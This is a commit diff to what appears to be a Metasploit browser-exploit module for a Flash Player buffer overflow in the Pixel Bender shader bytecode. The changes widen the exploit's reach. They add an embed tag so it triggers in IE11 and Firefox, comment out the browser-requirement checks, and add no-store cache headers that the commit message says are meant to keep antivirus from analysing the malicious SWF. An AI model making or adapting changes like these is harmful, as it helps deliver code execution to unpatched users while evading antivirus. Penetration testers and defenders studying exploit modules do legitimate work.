Updates to adobe_flash_pixel_bender_bof:
1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method). 2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :). Testing performed: Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.)bug/bundler_fix
Jonas Vestberg
parent
a97d9ed54f
commit
033757812d
|
|
@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
|
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
|
||||||
vulnerability occurs in the flash.Display.Shader class, when setting specially
|
vulnerability occurs in the flash.Display.Shader class, when setting specially
|
||||||
crafted data as its bytecode, as exploited in the wild in April 2014. This module
|
crafted data as its bytecode, as exploited in the wild in April 2014. This module
|
||||||
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
|
has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
|
||||||
Windows XP SP3, Windows 7 SP1 and Windows 8.
|
over Windows XP SP3, Windows 7 SP1 and Windows 8.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' =>
|
||||||
{
|
{
|
||||||
:source => /script|headers/i,
|
:source => /script|headers/i,
|
||||||
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
|
#:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
|
||||||
:method => "LoadMovie",
|
#:method => "LoadMovie",
|
||||||
:os_name => Msf::OperatingSystems::WINDOWS,
|
:os_name => Msf::OperatingSystems::WINDOWS,
|
||||||
:ua_name => Msf::HttpClients::IE,
|
#:ua_name => Msf::HttpClients::IE,
|
||||||
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
|
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
|
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if request.uri =~ /\.swf$/
|
if request.uri =~ /\.swf$/
|
||||||
print_status("Sending SWF...")
|
print_status("Sending SWF...")
|
||||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
|
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
<param name="allowScriptAccess" value="always" />
|
<param name="allowScriptAccess" value="always" />
|
||||||
<param name="FlashVars" value="sh=<%=flash_payload%>" />
|
<param name="FlashVars" value="sh=<%=flash_payload%>" />
|
||||||
<param name="Play" value="true" />
|
<param name="Play" value="true" />
|
||||||
|
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
|
||||||
</object>
|
</object>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue